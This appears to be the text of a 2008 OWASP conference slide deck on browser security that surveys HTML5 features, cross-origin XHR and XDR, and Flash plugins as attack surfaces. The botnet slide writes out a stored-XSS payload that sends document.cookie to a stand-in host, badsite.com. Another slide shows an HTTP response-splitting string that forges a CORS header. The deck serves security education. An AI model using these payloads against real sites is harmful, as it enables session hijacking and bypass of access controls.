Browser Security

OWASP – Browser Security Roberto Suggi Liverani Security Consultant Security-Assessment.com 3 September 2008

Who am I? Roberto Suggi Liverani Security Consultant, CISSP - Security-Assessment.com 4+ years in information security, focusing on web application and network security OWASP New Zealand founder/leader

Agenda Introduction A look to the present The potential risks Some challenges HTML 5.0 WebApps (XHR) Browser Plugins OWASP approach to the problem OWASP Intrinsic Group

Introduction Present : web security focus is mainly on web apps rather than browsers But : browser bugs affect much more users than web application bugs

Introduction Browsers statistics from w3schools.com JavaScript statistics

Introduction The risks are not just in the numbers… Do you remember “On the job browser exploitation” talk of Mark Piper? Technologies evolve: HTML5 XHR Browser Plugin Current browser security progress mainly focused on: Reflected XSS filtering and CSRF protection Phishing web sites detection

Next Challenges HTML5 (W3C working draft) New features with a security impact: Origin-Policy Browsing contexts and navigation Custom protocol and content handlers Structured client-side storage Offline Web applications Cross-document messaging Server-sent events Web sockets

HMTL5 Relaxing Origin-Policy: Window objects origin-policy exceptions: Location object postMessage() frames attribute XXX4 method y.hello.com x.hello.com XSS Injection document.domain = hello.com Communication between 2 subdomains through XSS

HTML5 Browsing Contexts and Navigations Opener browsing context – 1.COM Auxiliary Browser Context - 3.COM Nested browser context - 2.COM Malicious Third party 3.COM (b) Iframe injection src=2.COM 1.COM (vulnerable) Cross Context Scripting between 2.COM and 3.COM (a) Injection in 1.COM of document.open pointing to 3.COM

HTML5 Custom Protocol and content handlers registerProtocolHandler() – ftp:, fax:, foo: registerContentHandler() – MIME type, text/foo A.COM B.COM navigator.registerContentHandler(‘text/foo', ‘foo?url=%s', ‘foo') <a href=test.foo>Download </a> Test.foo served as text/foo redirection to: http://a.com/foo?url=b.com/test.foo

HTML5 Hijacking content or protocol handlers navigator.registerProtocolHandler(‘HTTPS', ‘foo?url=%s', ‘foo') Register Spamming Site tries to register multiple protocol/content handlers Multiple sites try registering video/mpeg content Leaking Intranet URLs User registers a certain content handler (text/foo) User clicks http://192.168.0.32/hello.foo User redirected to external site which handles text/foo Leaking HTTPS User redirected to site with HTTPS URL Leaking credentials in GET Request

HTML5 Structured Client Storage sessionStorage (adds data to the session for all pages under same domain) localStorage (adds complex data to client’s cache) Methods: getItem(), setItem() Only protection: origin policy SQL, yes SQL!!! – to store more structured data Methods: openDatabase(), executeSQL() Objects: SQLResultSet, SQLResultSetRowList, SQLError More to come on “browser SQL injection”…

HTML5 Client Storage Attack Example (A. Trivero) Browser SQL Injection Example (A. Trivero) Cross-Directory Attack XSS in www.geocities.com/user1 can read/write data from/to www.geocities.com/user2 User Tracking - UI put in client-storage in multiple sites (marketing, botnet, etc.) Cookie Resurrection

HTML5 Offline Web Applications Extensive Application Cache API <manifest>http://a.com/manifest</manifest> HTTP response with text/cache-manifest MIME type for manifest Manifest specifies how specific site content should be cached = application cache policy New items can be added to specific cached content with method add() Different versions of cached content for the same site Application Cache status can be queried: Uncached, Idle, Checking, Download, Updateready

HTML5 Application Cache Poisoning A.COM’s manifest allows caching of vulnerable HTML page containing DOM XSS DOM XSS manipulates data when viewed in off-line mode Attacking offline browser Off-line application cache content with stored XSS that sets navigator.onLine=TRUE

HTML5 Cross Document Messaging “ While this (origin policy) is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile” – 7.4 W3C HTML5 current draft postMessage(message, messagePort, targetOrigin) window.addEventListener('message', receiver, false); function receiver(e) { if (e.origin == ' http://a.com ') { if (e.data == ' Hello world ') { e.source.postMessage('Hello', e. origin ); } else { alert(e.data); } } } A.COM B.COM var o = document.getElementsByTagName('iframe')[0]; o.contentWindow.postMessage('Hello world', 'http://b.com/'); NOTE: this condition can be omitted or = *

HTML5 Server-Sent Events Dispatching DOM events into document that expect it RemoteEventTarget used to fetch data sent as EventStream (text/event-stream) from: Same site Allowed sites (XHR access control) <eventsource src=http://news.com/news.php onmessage=“var stream; event.stream.split(‘\n’); showNews(stream[0],stream[1],stream[2]);”> <eventsource> data: http://www.google.com/news/1\n data: http://www.yahoo/com/news/3\n data: http://bbc.co.uk/news/2\n EventStream PULLS

HTML5 Next generation web botnet – C&M interface BOTNET badsite.com/evil.php Stored XSS in botnet websites: <eventsource src=http://badsite.com/evil.php onmessage=“var stream; event.stream.split(‘\n’); eval(stream[0],stream[1],stream[2]);”> Data Stream (MIME: text/event-stream) Data: wait();\n Data: wait();\n Data: document.write(<img src=‘http://badsite.com/’+document.cookie);\n Botnet operates following XHR access control for data exchange

HTML5 Web Sockets – websocket(url); Botnet scenario applies as well Client at 123.com Server at aa.com GET ws://aa.com/ HTTP/1.1 Upgrade: WebSocket Connection: Upgrade Host: 123.com Origin: http://123.com Authorization: Basic d2FsbGU6ZXZl HTTP/1.1 101 Web Socket Protocol Handshake Upgrade: WebSocket Connection: Upgrade WebSocket-Origin: http://aa.com WebSocket-Location: ws://aa.com:80/ Data Framing Read/send data byte per byte Data Framing Send/read raw UTF8 data byte per byte Close TCP/IP connection – no handshake Close TCP/IP connection – no handshake

WebApps (XHR) XHR Access Control (GET and POST) Resource: aaa.com/test.txt Client: bbb.com JavaScript + XHR: new client = new XMLHttpRequest(); client.open("GET or POST", "http://aaa.com/test.txt") client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow-Origin: http://bbb.com Hello World! GET NOTE: the entire access control system relies on HTTP headers So what happens with an HTTP Splitting Attack? JavaScript + XHR: new client = new XMLHttpRequest(); client.open("GET or POST", "http://aaa.com/test.txt %0A%0DAccess-Control-Allow-Origin: http://bbb.com%0a%0d%0a%0d ") client.onreadystatechange = function() { /* do something */ } client.send()

WebApps (XHR) XHR Access Control (Other HTTP methods) Resource: aaa.com/test.txt Client: bbb.com JavaScript + XHR: new client = new XMLHttpRequest(); client.open(“OPTIONS", "http://aaa.com/test.txt") client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow-Origin: http://bbb.com Access-Control-Max-Age: 3628800 Preflight Request: OPTIONS JavaScript + XHR: new client = new XMLHttpRequest(); client.open(“DELETE", "http://aaa.com/test.txt") client.onreadystatechange = function() { /* do something */ } client.send() DELETE NOTE: the entire access control system relies on HTTP headers

XHR Alternative – XDR (Xdomain Request) Cross-domain request developed by Microsoft Resource: aaa.com/xdr.txt Client: bbb.com JavaScript + XDR: xdr = new XDomainRequest(); xdr.open(“GET", “http://www.aaa.com/xdr.txt") HTTP Response: XDomainRequestAllowed=1 Hello! GET HTTP Request: GET /xdr.txt XDomainRequest: 1 Host: bbb.com NOTE: the entire XDR relies on HTTP headers

Browser Plugins Adobe Flash LSO (Local Shared Objects) Cookie system completely managed by Adobe 100KB cache data allowed by default Third Party LSO are allowed by default (100kb cache) LSO data stored and accessed “stealthily” Typically stored in: C:\Documents and Settings\[username]\Application Data\Macromedia\Flash Player Files in the format .sol This “feature” has already been exploited: United Virtualies -> PIE (Persistent Identification Element) Creates a unique ID for each browser and then stores in LSO

Browser Plugins ActionScript FileReference.Download bypasses browser security settings IKAT’s Paul Craig 0day technique to bypass kiosk software protection (IE’s security model) Something like: test.addEventListener(MouseEvent.CLICK, downloadFile); var fileRef:FileReference = new FileReference(); function downloadFile(event:MouseEvent):void { fileRef.download(new URLRequest("http://www.aaa.com/file.html"), “file.html"); }

OWASP Intrinsic Group Aid browser vendors, framework vendors in addressing current security issues Focus on: HTML5 Working Group XMLHTTPRequest Webapp Working Group Mozilla Firefox Adobe (AIR/Flash) Microsoft IE7 Microsoft .NET Struts Spring Apache Commons Soon: OWASP Top Ten Browser Security

Questions? [email_address] http://malerisch.net http://www.owasp.org/index.php/New_Zealand

References HTML5 http://www.whatwg.org/specs/web-apps/current-work XHR and XHR Level 2 https://wiki.mozilla.org/Cross_Site_XMLHttpRequest http://dev.w3.org/2006/webapi/XMLHttpRequest-2 Access Controls XHR http://www.w3.org/TR/access-control/ XDR http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx http://lists.w3.org/Archives/Public/public-appformats/2008Mar/0017.html LSO http://epic.org/privacy/cookies/flash.html https://www.flashsec.org/wiki/Shared_Objects#Storage_location http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html http://www.adobe.com/products/flashplayer/articles/lso/ http://en.wikipedia.org/wiki/Local_Shared_Object

References HTML5 - Presentation http://www.owasp.org/index.php/AppSecEU08_HTML5 Abusing HTML 5 Structured Client-side Storage http://trivero.secdiscover.com/html5whitepaper.pdf Web Stats http://www.internetworldstats.com/stats.htm Browser Stats http://www.w3schools.com/browsers/browsers_stats.asp

Browser Security

More Related Content

What's hot (20)

Viewers also liked (20)

Similar to Browser Security (20)

More from Roberto Suggi Liverani (13)

Recently uploaded (20)

Browser Security

Editor's Notes